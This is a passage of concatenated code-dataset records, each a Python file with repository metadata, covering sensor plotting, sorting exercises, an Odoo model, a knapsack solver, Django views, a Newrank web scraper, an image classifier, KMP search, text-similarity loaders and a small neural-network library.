fig.add_subplot(222)\r\nsns.set()\r\nplt.xlabel(\"Zaman\")\r\nplt.ylabel(\"Parlaklık\")\r\nplt.title(\"Parlaklık-Zaman Grafiği\")\r\n\r\nax3 = fig.add_subplot(223)\r\nsns.set()\r\nplt.xlabel(\"Zaman\")\r\nplt.ylabel(\"Potansiyometre\")\r\nplt.title(\"Potansiyometre-Zaman Grafiği\")\r\n\r\nax4 = fig.add_subplot(224)\r\nsns.set()\r\ntime.time()\r\ndef animate(i):\r\n x1 = []\r\n y1 = []\r\n x2 = []\r\n y2 = []\r\n x3 = []\r\n y3 = []\r\n global y4\r\n global x4\r\n\r\n\r\n mesaj = s.recv(1024)\r\n veri = json.loads(mesaj)\r\n sonra = time.time()\r\n time1 = round(sonra-now,2)\r\n xa.append(time1)\r\n xb.append(time1)\r\n xc.append(time1)\r\n xd.append(time1)\r\n\r\n ya.append(veri[\"dahiliSicaklik\"])\r\n yb.append(veri[\"parlaklik\"])\r\n yc.append(veri[\"pts\"])\r\n yd.append(veri[\"sicaklik\"])\r\n\r\n if veri[\"tus\"] == 0:\r\n x1 = xa\r\n x2 = xb\r\n x3 = xc\r\n x4 = xd\r\n\r\n y1 = ya\r\n y2 = yb\r\n y3 = yc\r\n y4 = yd\r\n elif veri[\"tus\"] == 1:\r\n x2 = xb\r\n x3 = xc\r\n x4 = xd\r\n\r\n y2 = yb\r\n y3 = yc\r\n y4 = yd\r\n elif veri[\"tus\"] == 2:\r\n x1 = xa\r\n x3 = xc\r\n x4 = xd\r\n\r\n y1 = ya\r\n y3 = yc\r\n y4 = yd\r\n elif veri[\"tus\"] == 3:\r\n x1 = xa\r\n x2 = xb\r\n x4 = xd\r\n\r\n y1 = ya\r\n y2 = yb\r\n y4 = yd\r\n elif veri[\"tus\"] == 4:\r\n x1 = xa\r\n x2 = xb\r\n x3 = xc\r\n x4.pop()\r\n y1 = ya\r\n y2 = yb\r\n y3 = yc\r\n y4.pop()\r\n elif veri[\"tus\"] == 5:\r\n x4.pop()\r\n y4.pop()\r\n plt.cla()\r\n\r\n ax1.plot(x1, y1, color = '#444444')\r\n\r\n ax2.plot(x2, y2, color = '#444444')\r\n\r\n ax3.plot(x3, y3, color = '#444444')\r\n\r\n ax4.plot(x4, y4, color = '#444444')\r\n\r\n\r\n plt.xlabel(\"Zaman\")\r\n plt.ylabel(\"Sıcaklık\")\r\n plt.title(\"Sıcaklık-Zaman Grafiği\")\r\n i += 1\r\n\r\nnow = time.time()\r\n\r\nani = FuncAnimation(plt.gcf(), animate, interval=900)\r\n\r\n\r\nplt.tight_layout()\r\nplt.show()","repo_name":"yaman158/pico-w-data-visualization","sub_path":"ubeybi.py","file_name":"ubeybi.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"70490392302","text":"'''Bài 1: Viết chương trình nhập vào từ bàn phím một danh sách gồm 10 số nguyên và thực hiện các\nyêu cầu sau:\n- Sắp xếp danh sách trên theo chiều tăng dần\n- In kết quả ra màn hình'''\na = []\nwhile True:\n n=input('Nhập phần tử của danh sách: ').upper()\n if n == \"N\":\n break\n a.append(int(n))\nprint('Danh sách trước khi sắp xếp')\nprint(a)\nprint('Danh sách sau khi sắp xếp tăng dần')\nfor i in range(len(a)):\n for j in range(i+1,len(a)):\n if a[i]>a[j]:\n a[i], a[j] = a[j], a[i]\nprint(a)","repo_name":"rekuantsun/PYTHON2-PYCHARM","sub_path":"P2-25-11-Sắp xếp và tìm kiếm/Sắp xếp/no1.py","file_name":"no1.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"29207788506","text":"from openerp import models, fields, api\n\n\nclass AccountInvoice(models.Model):\n _inherit = 'account.invoice'\n\n sale_comment = fields.Text(string='Internal comments')\n\n @api.multi\n def onchange_partner_id(self, invoice_type, partner_id,\n date_invoice=False, payment_term=False,\n partner_bank_id=False, company_id=False):\n val = super(AccountInvoice, self).onchange_partner_id(\n invoice_type, partner_id, date_invoice=date_invoice,\n payment_term=payment_term, partner_bank_id=partner_bank_id,\n company_id=company_id)\n if partner_id:\n partner_obj = self.env['res.partner']\n partner = partner_obj.browse(partner_id)\n comment = partner.invoice_comment or ''\n if partner.parent_id:\n comment += '\\n%s' % (partner.parent_id.invoice_comment or '')\n val['value']['sale_comment'] = comment\n return val\n","repo_name":"slevenhagen/odoomrp-wip-npg","sub_path":"sale_documents_comments/models/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"} +{"seq_id":"39089027373","text":"import random\r\n\r\nn = 10\r\nr = [random.randint(1, 100) for _ in range(n)]\r\nprint(f'Массив: {r}')\r\n\r\nmin_i = 0\r\nmax_i = 0\r\nstep = 1\r\nsum_num = 0\r\n\r\nfor i in r:\r\n if r[min_i] > i:\r\n min_i = r.index(i)\r\n elif r[max_i] < i:\r\n max_i = r.index(i)\r\n\r\nif max_i - min_i < 0:\r\n step = -1\r\n\r\nfor i in r[min_i + step:max_i:step]:\r\n sum_num += i\r\n\r\nprint(f'Сумма элементов между минимальным ({r[min_i]}) и максимальным ({r[max_i]}) элементами: {sum_num}')\r\n","repo_name":"tsnv76/algorithms","sub_path":"lesson3_6.py","file_name":"lesson3_6.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"17385690350","text":"from sys import stdin, stdout\ndef readInts():\n return [int(x) for x in stdin.readline().split()]\ndef readInt():\n return int(stdin.readline())\ndef readLine():\n return stdin.readline().strip()\ndef makecase(tc):\n return \"Case #\"+str(tc)+\": \"\n#template end\n\nt = readInt()\n\nfor testcase in range(t):\n A, N = readInts()\n arr = readInts()\n arr = sorted(arr)\n\n dp = {}\n\n def getsoln(i, j, mote):\n #print(i, j, mote)\n if i > j:\n return 0\n \n if i == j:\n if mote > arr[i]:\n return 0\n else:\n return 1\n\n if (i, j, mote) in dp:\n return dp[(i, j, mote)]\n\n start = mote\n\n for k in range(i, j+1):\n if arr[k] < start:\n start += arr[k]\n else:\n break\n \n if start > arr[k]:\n return 0\n \n ans = 0\n if start > 1:\n ans = 1 + min(getsoln(k, j, start + start - 1), getsoln(k, j-1, start))\n else:\n ans = 1 + getsoln(k, j-1, start)\n \n dp[(i, j, mote)] = ans\n return ans\n \n res = getsoln(0, N - 1, A)\n\n print(\"Case #{}: {}\".format(testcase+1, res))\n","repo_name":"chethan-89/ProblemSolving","sub_path":"Codejam/motes.py","file_name":"motes.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"11267984745","text":"def knapsack_01(n, values, weights, W):\n dp = [[0] * (W + 1) for _ in range(n + 1)]\n\n for i in range(n + 1):\n for w in range(W + 1):\n if i == 0 or w == 0:\n dp[i][w] = 0\n elif weights[i - 1] <= w:\n dp[i][w] = max(\n dp[i - 1][w], dp[i - 1][w - weights[i - 1]] + values[i - 1]\n )\n else:\n dp[i][w] = dp[i - 1][w]\n\n selected_items = []\n i, w = n, W\n while i > 0 and w > 0:\n if dp[i][w] != dp[i - 1][w]:\n selected_items.append(i - 1)\n w -= weights[i - 1]\n i -= 1\n\n return dp[n][W], selected_items\n\n\nif __name__ == \"__main__\":\n n = 3\n values = [60, 100, 120]\n weights = [10, 20, 30]\n W = 50\n\n max_value, selected_items = knapsack_01(n, values, weights, W)\n print(\"Maximum value:\", max_value)\n print(\"Selected items:\", selected_items)\n","repo_name":"shreyamhetre/LabPracticals","sub_path":"DAA/Lab4.py","file_name":"Lab4.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"1706215573","text":"from django.contrib.auth.models import User\nfrom django.shortcuts import render, get_object_or_404, redirect\n\nfrom django_models.web.models import Employee, Department\n\n\ndef index(request):\n employees = [x for x in Employee.objects.all() if x.department_id == 2]\n employees2 = Employee.objects.filter(department_id=2) \\\n # .order_by('years_of_experience')\n # employees2 = Employee.objects \\\n # .filter(department__name='Engineering') \\\n # .order_by('years_of_experience')\n department = Department.objects.get(pk=2)\n context = {\n 'employees': employees,\n 'employees2': employees2,\n 'department': department,\n }\n\n return render(request, 'index.html', context)\n\n\ndef department_details(request, pk, slug):\n context = {\n 'department': get_object_or_404(Department, pk=pk, slug=slug),\n }\n return render(request, 'department-details.html', context)\n\n\ndef delete_employee(request, pk):\n # get_object_or_404(Department, pk=2) \\\n # .delete()\n employee = get_object_or_404(Employee, pk=pk)\n employee.delete()\n return redirect('index')\n","repo_name":"TheShadowTM/Python_Web_Beginner","sub_path":"django_models/django_models/web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"26712517526","text":"from bs4 import BeautifulSoup\n\n# Skip this for now, use below loop\n'''for link in soup.find_all('a'):\n\ttext = link.text.strip()\n\tprint text\n\nfor link in soup.find_all('a'):\n\turl = link.get('href')\n\tprint url'''\n\t\n\t\n# Last step before we have desired data. Desired data is saved in true_data.txt\nevent_data_open = open(\"event_data.txt\", \"r\")\nsoup = BeautifulSoup(event_data_open.read())\n\nevent_data = []\n\t\nfor data in soup.find_all('a'):\n\ttext = data.text.strip()\n\turl = data.get('href')\n\tevent_data.append(text)\n\tevent_data.append(url)\n\n","repo_name":"shanemduggan/old_projects","sub_path":"HereSay-Sandbox/sandbox/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"25367485328","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#   @CreateTime    : 2018/11/8 16:08\n#   @Author  : yanwj\n#   @File    : newrank_rank.py\n\n# https://www.newrank.cn/public/info/list.html?period=day&type=data正常访问网站\n# https://www.newrank.cn/xdnphb/list/day/rank?post请求\n# https://www.newrank.cn/xdnphb/list/week/rank?post请求\n# https://www.newrank.cn/xdnphb/list/month/rank?post请求\nimport json\nimport logging\nimport os\nimport threading\nimport time\nfrom datetime import datetime, timedelta\nimport threadpool\nimport js2py\nfrom Tools.db_tools.mongo_tools import MongoClientTools\nfrom Tools.db_tools.redis_tools import RedisConnection\nfrom Tools.http_tools import get_response\nfrom config import CONFIG_MONGO, CONFIG_REDIS\n\nSOURCE = 'Rank'\n# 日榜,周榜,月榜\nLIST_TYPE = ['day', 'week', 'month']\n# 模块\nMODULES = ['时事', '民生', '财富', '科技', '创业', '汽车', '楼市', '职场', '教育', '学术', '政务', '企业',\n '文化', '百科', '健康', '时尚', '美食', '乐活', '旅行', '幽默', '情感', '体娱', '美体', '文摘']\n\nRANK_NAME_GROUP = '资讯'\n\nformdata = {\n 'end': '2018-10-31',\n 'rank_name': '时事',\n 'rank_name_group': '资讯',\n 'start': '2018-10-01',\n 'nonce': '9e832ba06',\n 'xyz': '84f3af804b2f9a101dbe8e19d2d2f1ff',\n}\n# xyz 参数加密需要模板种类\nXYZ_PARSER_MODULES = {\n 'getFull': '',\n 'getAdvertBannerImage': '',\n 'getDate': '',\n 'getSampleRecord': \"/xdnphb/list/getSampleRecord?AppKey=joker&date={0}&nonce=\",\n 'rank': \"/xdnphb/list/{0}/rank?AppKey=joker&end={2}&rank_name={3}&rank_name_group={4}&start={1}&nonce=\",\n}\n\n\nclass GetNewrankJS:\n def __init__(self):\n with open('newrank_js_code.js', 'r', encoding='gb18030') as fr:\n self.js_code = fr.read()\n\n # .format('day', formdata['end'], formdata['rank_name'], formdata['rank_name_group'], formdata['start'])\n\n # 执行js文件获取nonce和xyz\n def run(self, parser_module):\n while True:\n try:\n return js2py.eval_js(self.js_code.replace('666666', parser_module))\n except Exception as e:\n logging.info(parser_module + '加密错误', e)\n time.sleep(60)\n\n\nclass NewRank:\n def __init__(self):\n self.redis_conn = RedisConnection().redis_connect(**CONFIG_REDIS)\n self.conn = MongoClientTools()\n self.hours = datetime.now().hour\n self.day = datetime.now().day\n self.week = datetime.now().weekday()\n self.year = datetime.now().year\n self.month = datetime.now().month\n self.get_js_result = GetNewrankJS()\n # 待加密的队列\n self.parser_module_queue = []\n self.get_all_parser_module()\n # url队列\n self.request_queue = []\n # self.get_request_queue() # 单线程处理加密队列\n self.thread_get_parser_url() # 多线程处理加密队列\n\n def get_history_date(self):\n \"\"\"\n 根据榜单获取统计时间区间,去重\n :return:\n \"\"\"\n date_range = set()\n dates = self.conn.search('WeChat_OffiAccot_Rank')\n for item in dates:\n date_range.add(item['统计时间区间'])\n return date_range\n\n def get_all_parser_module(self):\n start_date = datetime(self.year, self.month, self.day)\n # 如果当前的小时早于中午12点,则最近一天显示的是前天的统计信息,反之是统计的昨天的信息\n # 日榜情况:最近7天的数据可以查询到,前一天数据需要第二天12点截止才能获取到\n if self.hours > 12:\n history_days = [(start_date - timedelta(1 + n)).strftime('%Y-%m-%d') for n in range(7)]\n else:\n history_days = [(start_date - timedelta(2 + n)).strftime('%Y-%m-%d') for n in range(7)]\n\n for day in history_days:\n time_range_day = '(%s, %s)' % (day, day)\n if self.redis_conn.sismember('newrank_time_range_filter', time_range_day):\n continue\n self.redis_conn.sadd('newrank_time_range_filter', time_range_day)\n sample_size = self.get_samplesize(day)\n # 每天,的24个种类模块\n self.parser_module_queue.extend(\n [{'module': XYZ_PARSER_MODULES['rank'].format('day', day, day, rank_name, '资讯'),\n 'list_type': '日榜',\n 'rank_name': rank_name,\n 'rank_name_group': '资讯',\n 'start_date': day,\n 'end_date': day,\n 'samplesize': sample_size,\n } for rank_name in MODULES])\n\n # 周榜情况:本次周期10.29-11.04。数据星期一12点后截止统计\n # 获取最近一周的起始日期\n week_start_lately = start_date - timedelta(self.week)\n week_end_lately = week_start_lately + timedelta(6)\n # 星期一为0,星期天为6\n # 如果不为星期一,获取上周的周起始时间结束时间\n if self.week > 0:\n # 根据最近的星期周期,获取更早两周的周期,统计近三周的数据\n history_weeks = [((week_start_lately - timedelta(n * 7)).strftime('%Y-%m-%d'),\n (week_end_lately - timedelta(n * 7)).strftime('%Y-%m-%d')) for n in range(1, 4)]\n else:\n # 如果为星期一,判断时间是否在12点之前,在12点之前的,则只能获取的上上周的数据\n if self.hours > 12:\n # 最近一周为上周\n history_weeks = [((week_start_lately - timedelta(n * 7)).strftime('%Y-%m-%d'),\n (week_end_lately - timedelta(n * 7)).strftime('%Y-%m-%d')) for n in range(1, 4)]\n else:\n # 最近的一周为上上周\n history_weeks = [((week_start_lately - timedelta(n * 7)).strftime('%Y-%m-%d'),\n (week_end_lately - timedelta(n * 7)).strftime('%Y-%m-%d')) for n in range(2, 5)]\n for week in history_weeks:\n time_range_week = '(%s, %s)' % (week[0], week[1])\n if self.redis_conn.sismember('newrank_time_range_filter', time_range_week):\n continue\n self.redis_conn.sadd('newrank_time_range_filter', time_range_week)\n sample_size = self.get_samplesize(week[1])\n # 每周24个种类的解析模板\n self.parser_module_queue.extend(\n [{'module': XYZ_PARSER_MODULES['rank'].format('week', week[0], week[1], rank_name, '资讯'),\n 'list_type': '周榜',\n 'rank_name': rank_name,\n 'rank_name_group': '资讯',\n 'start_date': week[0],\n 'end_date': week[1],\n 'samplesize': sample_size,\n } for rank_name in MODULES])\n\n # 月榜每月一次,一般在1号12点以后,只能获取最近三月的情况\n # 获取当前月份,若当前时间大于当前月的1号的12点,则最近月为上一个月,否则为上上个月\n if datetime(self.year, self.month, self.day, self.hours) > datetime(self.year, self.month, 1, 12):\n # 获取最近三月的第一天和最后一天\n histtory_months = [(datetime(self.year, self.month - n, 1).strftime('%Y-%m-%d'),\n (datetime(self.year, self.month - (n - 1), 1) - timedelta(1)).strftime('%Y-%m-%d'))\n for n in range(1, 4)]\n else:\n histtory_months = [(datetime(self.year, self.month - n, 1).strftime('%Y-%m-%d'),\n (datetime(self.year, self.month - (n - 1), 1) - timedelta(1)).strftime('%Y-%m-%d'))\n for n in range(2, 5)]\n for month in histtory_months:\n time_range_month = '(%s, %s)' % (month[0], month[1])\n if self.redis_conn.sismember('newrank_time_range_filter', time_range_month):\n continue\n self.redis_conn.sadd('newrank_time_range_filter', time_range_month)\n sample_size = self.get_samplesize(month[1])\n # 每y月24个种类的解析模板\n self.parser_module_queue.extend(\n [{'module': XYZ_PARSER_MODULES['rank'].format('month', month[0], month[1], rank_name, '资讯'),\n 'list_type': '月榜',\n 'rank_name': rank_name,\n 'rank_name_group': '资讯',\n 'start_date': month[0],\n 'end_date': month[1],\n 'samplesize': sample_size,\n } for rank_name in MODULES])\n\n return self.parser_module_queue\n\n def get_samplesize(self, date):\n \"\"\"\n 获取样板数量,\n :return:str样板数量值\n \"\"\"\n parser_module = XYZ_PARSER_MODULES['getSampleRecord'].format(date)\n # 获取加密结果\n result = self.get_js_result.run(parser_module)\n url = 'https://www.newrank.cn' + parser_module.replace('AppKey=joker&', '') + result['nonce'] + '&xyz=' + \\\n result['xyz']\n while True:\n response = get_response(url)\n try:\n sanmplsize = response.json()['value']\n if sanmplsize:\n return sanmplsize\n except Exception as e:\n logging.info('获取json数据错误--》%s' % e)\n # print('获取json数据错误--》%s\\n%s' % (e, response.json()))\n time.sleep(10)\n\n def get_request_queue(self):\n pass\n # # 单线程js加密算法处理特别慢,但是js2py处理加密不会报错\n # for parse_module in self.parser_module_queue:\n # logging.info(' 板块:{%s}, 类别:{%s} 起始时间(%s, %s) 正在解密参数......' % (\n # parse_module['list_type'], parse_module['rank_name'], parse_module['start_date'],\n # parse_module['end_date']))\n # # 获取加密结果\n # result = self.get_js_result.run(parse_module['module'])\n # parse_module['url'] = 'https://www.newrank.cn' + parse_module['module'].replace('AppKey=joker&', '') + \\\n # result['nonce'] + '&xyz=' + result['xyz']\n # logging.info('成功获取解密后的POST链接:{%s}' % parse_module['url'])\n # self.request_queue.append(parse_module)\n # break\n #\n # logging.info('全部解密完成,共计url %s 条' % len(self.request_queue))\n # return self.request_queue\n\n def thread_get_parser_url(self):\n \"\"\"\n 线程池:利用15个线程进行解密处理(总计需要获取日榜7 * 24 + 周榜3*24 + 月榜3*24 = 312 条url)\n :return:\n \"\"\"\n modules = [item['module'] for item in self.parser_module_queue]\n pool = threadpool.ThreadPool(30)\n parser_queue = threadpool.makeRequests(self.get_js_result.run, modules, callback=self.callback)\n [pool.putRequest(url) for url in parser_queue]\n pool.wait()\n\n def callback(self, request, result):\n \"\"\"\n 线程池的回调函数\n :param request:可以通过request.arg[0]获取执行函数的参数\n :param result:执行函数的返回值\n :return:\n \"\"\"\n url = 'https://www.newrank.cn' + request.args[0].replace('AppKey=joker&', '') + result['nonce'] + '&xyz=' + \\\n result['xyz']\n logging.info('成功获取解密后的POST链接:{%s}' % url)\n for item in self.parser_module_queue:\n # 将新生成的链接存入parser_module_queue里对应的每个元素\n if request.args[0] == item['module']:\n item['url'] = url\n self.redis_conn.lpush('newrank_request', item)\n # self.request_queue.append(item)\n\n def get_and_save_json(self):\n \"\"\"\n 从redis队列,拿到url数据,请求并将结果存到mongo\n :return:\n \"\"\"\n while True:\n item = self.redis_conn.spop('newrank_request_item')\n if not item:\n break\n item = eval(item)\n while True:\n response = get_response(item['url'])\n try:\n detail = response.json()\n if detail:\n detail = detail['value']\n detail.update({'samplesize': item['samplesize']})\n break\n except Exception as e:\n logging.info('获取json数据错误--》%s' % e)\n time.sleep(10)\n result = {\n '抓取时间': datetime.now().strftime('%Y-%m-%d %H:%S:%M'),\n '统计时间区间': '(%s, %s)' % (item['start_date'], item['end_date']),\n '统计截止日期': datetime.strptime(item['end_date'], '%Y-%m-%d') + timedelta(days=1, hours=12),\n '榜单类型': item['list_type'],\n '模块': item['rank_name'],\n '详情': detail\n }\n logging.info('正在存入数据 {%s: %s %s} {}' % (result['榜单类型'], result['模块'], result['统计时间区间']))\n self.conn.save(result, CONFIG_MONGO['table2'] + SOURCE)\n\n def run(self):\n for i in range(3):\n th = threading.Thread(target=self.get_and_save_json)\n th.start()\n\n\nif __name__ == '__main__':\n if not os.path.exists('./log'):\n os.mkdir('./log')\n logging.basicConfig(level=logging.INFO,\n filemode=\"a\",\n filename=\"./log/newrank_rank.log\",\n format='%(asctime)s %(filename)s [line:%(lineno)d] %(levelname)s %(message)s', )\n newrank = NewRank()\n newrank.run()\n\n","repo_name":"jun-ge/Crawl","sub_path":"apps/newrank/newrank_rank.py","file_name":"newrank_rank.py","file_ext":"py","file_size_in_byte":13930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"5479166534","text":"import pickle\nimport numpy as np\nimport cv2\nfrom skimage.feature import hog\nfrom skimage import exposure\n\n\ndef apply_hog(img, visualise=True):\n fd, hog_im = hog(img, orientations=9, pixels_per_cell=(5, 5),\n cells_per_block=(1, 1), visualise=visualise,\n block_norm='L2-Hys')\n\n hog_image_rescaled = exposure.rescale_intensity(hog_im, in_range=(0, 10))\n return hog_image_rescaled\n\n\ndef add_disk_mask(im):\n r, c = im.shape\n rw, cl = np.ogrid[:r, :c]\n cr, cc = r / 2, c / 2\n\n mask = (((rw - cr) ** 2) + ((cl - cc) ** 2) > (cr ** 2))\n im[mask] = 0\n\n return im\n\n\ndef flatten(img):\n return img.reshape(1, img.shape[0] * img.shape[1])\n\n\ndef preprocessing_pipeline(image):\n print('processing...')\n final = apply_hog(image)\n final = add_disk_mask(final)\n final = flatten(final)\n\n return final\n\n\ndef capture_image():\n cap = cv2.VideoCapture(0)\n success, frame = cap.read()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n key = cv2.waitKey(1)\n cap.release()\n\n return frame\n\n\ndef classify_image(clf, im):\n y = clf.predict(im)\n if y == 0:\n return 'none'\n elif y == 1:\n return 'play'\n elif y == 2:\n return 'pause'\n elif y == 3:\n return 'volumn down'\n elif y == 4:\n return 'volumn up'\n\n\nclf = pickle.load(open('model.json', 'rb'))\nim = capture_image()\nim = preprocessing_pipeline(im)\nlabel = classify_image(clf, im)\nprint(label)\n","repo_name":"SuryaThiru/smartVLC","sub_path":"cam_classify.py","file_name":"cam_classify.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"40648248056","text":"array = ['a','b','c','a','b','d']\n#next = 0 0 0 1 2 0\n\n#index = 0 1 2 3 4 5\nnext = [0] * len(array)\n####t与i的初始位置\ni = 1\nt = 0\n\nwhile i < len(array):\n if array[i] == array[t]:\n next[i] = t + 1\n i += 1\n t += 1\n elif t>0: #这个地方最难记,把t退回到next[t-1]位置\n t = next[t-1]\n else:#t == 0\n next[i] = 0\n i += 1\n\nprint(next)\n\n##############\n'''\n一共三种情况,\n1.array[i] == array[t],next[i]=t+1\n2.当array[i] != array[t],\n'''\ndef prefix_table(pattern):\n next = [0] * len(pattern)\n ####t与i的初始位置\n i = 1\n t = 0\n\n while i < len(pattern):\n if pattern[i] == pattern[t]:\n next[i] = t + 1\n i += 1\n t += 1\n elif t > 0: # 这个地方最难记,把t退回到next[t-1]位置\n t = next[t - 1]\n else: # t == 0\n next[i] = 0\n i += 1\n return next\ndef move_prefix_table(prefix, n):\n for i in range(n-1, 0, -1):\n prefix[i] = prefix[i-1]\n prefix[0] = -1\n return prefix\n\ndef kmp_search(text, pattern):\n next = prefix_table(pattern)\n next = move_prefix_table(next, len(next))\n m = len(text)\n n = len(pattern)\n i = 0\n j = 0\n while i < m:\n if j == n-1 and text[i] == pattern[j]:\n print(\"Found at \",(i-j))\n break\n j = next[j]\n if text[i] == pattern[j]:\n i += 1\n j += 1\n else:\n j = next[j]\n if j == -1:\n i += 1\n j += 1\n\n\npattern = ['A','B','A','B','C','A','B','A','A']\ntext = ['A','B','A','B','A','B','C','A','B','A','A','B','A','B','A','B','A','B']\nkmp_search(text, pattern)","repo_name":"lczen/learnPython","sub_path":"未整理/kmp.py","file_name":"kmp.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"22803094712","text":"# coding: utf8\nfrom __future__ import print_function\n\nimport codecs\nimport json\nimport os\n\nimport pyprind\n\nfrom stst import utils\nfrom stst.data.sent_pair import SentPair\n\n\ndef load_data(train_file):\n \"\"\"\n Return list of dataset given train_file and gs_file\n Value: [(sa:str, sb:str, score:float)]\n \"\"\"\n with codecs.open(train_file, 'r', encoding='utf8') as f:\n data = []\n for idx, line in enumerate(f):\n line = line.strip().split('\\t')\n score = 0.\n if len(line) == 3:\n score = float(line[2])\n sa, sb = line[0], line[1]\n data.append((sa, sb, score))\n return data\n\n\ndef load_STS(train_file):\n with utils.create_read_file(train_file) as f:\n data = []\n for line in f:\n line = line.strip().split('\\t')\n score = float(line[4])\n sa, sb = line[5], line[6]\n data.append((sa, sb, score))\n return data\n\n\ndef load_parse_data(train_file, parser=None, flag=False):\n \"\"\"\n Load data after Parse, like POS, NER, etc.\n Value: [ SentPair:class, ... ]\n Parameter:\n flag: False(Default), Load from file (resources....)\n True, Parse and Write to file, and then load from file\n \"\"\"\n ''' Pre-Define Write File '''\n\n # parse_train_file = config.PARSE_DIR + '/' + \\\n # utils.FileManager.get_file(train_file)\n\n parse_train_file = train_file.replace('./data', './generate/parse')\n\n if flag or not os.path.isfile(parse_train_file):\n\n print(train_file)\n if parser is None:\n raise RuntimeError(\"parser should be init by ``nlp = stst.StanfordNLP('http://localhost:9000')``\")\n\n ''' Parse Data '''\n data = load_STS(train_file)\n\n print('*' * 50)\n print(\"Parse Data, train_file=%s, n_train=%d\\n\" % (train_file, len(data)))\n\n parse_data = []\n process_bar = pyprind.ProgPercent(len(data))\n for (sa, sb, score) in data:\n process_bar.update()\n parse_sa = parser.parse(sa)\n parse_sb = parser.parse(sb)\n parse_data.append((parse_sa, parse_sb, score))\n\n ''' Write Data to File '''\n with utils.create_write_file(parse_train_file) as f_parse:\n for parse_instance in parse_data:\n line = json.dumps(parse_instance)\n print(line, file=f_parse)\n\n ''' Load Data from File '''\n print('*' * 50)\n parse_data = []\n with utils.create_read_file(parse_train_file) as f:\n for line in f:\n parse_json = json.loads(line)\n sentpair_instance = SentPair(parse_json)\n parse_data.append(sentpair_instance)\n\n print(\"Load Data, train_file=%s, n_train=%d\\n\" % (train_file, len(parse_data)))\n return parse_data\n\n\ndef load_sentences(file_list, type='lemma'):\n \"\"\"\n sentence_dict['file'][idx]['sa'] = idx\n sentence_dict['file'][idx]['sb'] = idx+1\n \"\"\"\n sentence_tags = []\n sentences = []\n for file in file_list:\n # file is path\n file_name = file.split('/')[-1]\n parse_data = load_parse_data(file, None)\n for idx, train_instance in enumerate(parse_data):\n if type == 'lemma':\n sa, sb = train_instance.get_word(type='lemma', stopwords=False, lower=True)\n elif type == 'word' :\n sa, sb = train_instance.get_word(type='word')\n sa_tag = \"%s_%d_sa\" % (file_name, idx)\n sb_tag = \"%s_%d_sb\" % (file_name, idx)\n\n sentences.append(sa)\n sentence_tags.append(sa_tag)\n\n sentences.append(sb)\n sentence_tags.append(sb_tag)\n\n return sentences, sentence_tags","repo_name":"rgtjf/Semantic-Texual-Similarity-Toolkits","sub_path":"stst/data/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":3705,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"91"} +{"seq_id":"17556650608","text":"import autodiff as ad\r\nimport numpy as np\r\nimport Xatolik \r\nimport Sozlovchi\r\nfrom tqdm import tqdm\r\n\r\nnp.random.seed(345)\r\n\r\nclass Layer:\r\n def __init__(self):\r\n pass\r\n\r\nclass Dense(Layer):\r\n def __init__(self, units):\r\n self.units = units\r\n self.w = None\r\n self.b = None\r\n\r\n #Forward propagation for 1 hidden layer\r\n def __call__(self, x): \r\n if self.w is None:\r\n self.w = ad.Tensor(np.random.uniform(size=(x.shape[-1], self.units), low=-1/np.sqrt(x.shape[-1]), high=1/np.sqrt(x.shape[-1])))\r\n self.b = ad.Tensor(np.zeros((1, self.units)))\r\n return x @ self.w + self.b\r\n\r\n #Gradient Descent\r\n def update(self, optim): \r\n self.w.value -= optim.delta(self.w)\r\n self.b.value -= optim.delta(self.b)\r\n\r\n self.w.grads = []\r\n self.w.dependencies = []\r\n self.b.grads = []\r\n self.b.dependencies = []\r\n\r\nclass Sigmoid:\r\n def __call__(self, x):\r\n return np.e**x /(1 + np.e**x)\r\n\r\nclass Softmax:\r\n def __call__(self, x):\r\n s = np.array(x).reshape(-1,1)\r\n return ad.Tensor(np.diagflat(s) - np.dot(s, s.T))\r\n \r\nclass Relu:\r\n def __call__(self, x):\r\n self.output = np.maximum(0, x)\r\n return self.output\r\n \r\nclass Model:\r\n def __init__(self, layers):\r\n self.layers = layers\r\n\r\n #Forward propagation\r\n def __call__(self, x): \r\n output = x\r\n\r\n for layer in self.layers:\r\n output = layer(output)\r\n\r\n return output\r\n\r\n def train(self, x, y, epochs=10, loss = Xatolik.MSE, optimizer=Sozlovchi.SGD(lr=0.1), batch_size=1):\r\n for epoch in range(epochs):\r\n LOSS = 0\r\n print (f\"EPOCH\", epoch + 1)\r\n for batch in tqdm(range(0, len(x), batch_size)):\r\n output = self(x[batch:batch+batch_size])\r\n l = loss(output, y[batch:batch+batch_size])\r\n optimizer(self, l)\r\n LOSS += l\r\n \r\n print (\"LOSS\", LOSS.value)\r\n print (\" 